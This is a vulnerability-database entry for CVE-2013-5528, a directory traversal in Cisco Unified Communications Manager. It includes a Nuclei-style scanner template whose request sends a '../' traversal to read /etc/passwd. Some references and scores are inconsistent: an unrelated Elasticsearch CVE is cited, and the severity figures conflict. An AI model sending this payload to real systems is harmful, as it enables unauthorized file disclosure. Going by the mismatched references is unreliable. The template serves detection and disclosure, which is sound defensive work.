Cisco Unified Communications Manager 7/8/9 - Directory Traversal

🗓️ 27 Jun 2026 03:01:36Reported by ProjectDiscoveryType

A directory traversal vulnerability in Cisco Unified Communications Manager 7/8/9 allows remote users to read arbitrary files via an unspecified input strin

Reporter	Title	Published	Views	Family All 57
0day.today	ElasticSearch Remote Code Execution Exploit	15 May 201400:00	–	zdt
0day.today	ElasticSearch Dynamic Script Arbitrary Java Execution	1 Jun 201400:00	–	zdt
0day.today	Cisco Unified Communications Manager 7/8/9 - Directory Traversal Vulnerability	7 Dec 201600:00	–	zdt
Gitee	Exploit for Improper Access Control in Elasticsearch	6 Jul 202502:42	–	gitee
Gitee	Exploit for Improper Access Control in Elasticsearch	3 Jun 202110:56	–	gitee
Gitee	Exploit for Improper Access Control in Elasticsearch	3 Sep 202008:57	–	gitee
Gitee	Exploit for Improper Access Control in Elasticsearch	21 Sep 202014:36	–	gitee
Gitee	Exploit for Improper Access Control in Elasticsearch	25 Jan 202102:52	–	gitee
Gitee	Exploit for Improper Access Control in Elasticsearch	18 Oct 202000:49	–	gitee
Gitee	Exploit for Improper Access Control in Elasticsearch	4 Dec 201921:40	–	gitee

Source	Link
exploit-db	www.exploit-db.com/exploits/40887
nvd	www.nvd.nist.gov/vuln/detail/CVE-2014-3120
tools	www.tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
github	www.github.com/ARPSyndicate/kenzer-templates

id: CVE-2013-5528

info:
  name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system.
  remediation: |
    Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/40887
    - https://nvd.nist.gov/vuln/detail/CVE-2014-3120
    - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2013-5528
    cwe-id: CWE-22
    epss-score: 0.23309
    epss-percentile: 0.97491
    cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: unified_communications_manager
  tags: cve2013,cve,lfi,cisco,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e62f112825a9f4fa58eed630385fa893d55d1047ed0187087f3185193ae29dcc022100c8753ead1735492f8459edca5298981ff6bec2d4220f53ebf467fa38760474ad:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

7.4High risk

Vulners AI Score7.4

CVSS 26.8

CVSS 3.18.1

EPSS0.88559

SSVC